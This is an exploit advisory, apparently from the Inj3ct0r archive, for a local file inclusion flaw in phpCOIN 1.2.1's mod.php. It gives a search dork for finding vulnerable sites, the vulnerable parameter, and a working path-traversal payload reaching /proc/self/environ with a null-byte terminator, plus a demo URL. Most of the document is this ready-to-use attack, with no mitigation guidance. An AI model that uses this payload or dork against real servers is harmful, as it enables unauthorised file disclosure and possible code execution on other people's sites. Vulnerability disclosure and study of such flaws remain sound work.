phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability
Posted on 07 March 2010
========================================================== phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability ========================================================== # Exploit Title: phpCOIN 1.2.1 (mod.php) LFI vulnerability # Author: _mlk_ # Software Link: null # Version: phpCOIN 1.2.1 # Tested on: Linux*,*BSD and *windows # Code : on paper phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability ############################################################################################################# # # # [-] Information # # # # [+] Script : phpCOIN 1.2.1 # # # # [+] Language : PHP # # # # [+] Vendor : http://www.phpcoin.com/ # # # # [+] Dork/String : "Powered By phpCOIN v1.2.1" / "mod.php?mod=faq" # # # # [+] Date : 02/03/10 (Brazil) # # # ############################################################################################################# # # # [*] Example : # # # # http://localhost/[PATH]/mod.php?mod=[LFI]%00# # http://localhost/mod.php?mod=[LFI]%00# # # # # # --------------------------------------------------------------------------------------- # # # # # # [*] Exploit : # # # # /../../../../../../proc/self/environ%00 # # /proc/self/environ%00 # # # # # # --------------------------------------------------------------------------------------- # # # # # # [*] Demo : # # # # http://server/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00 # # # # # ############################################################################################################# # ~ - [ [ : Inj3ct0r : ] ]
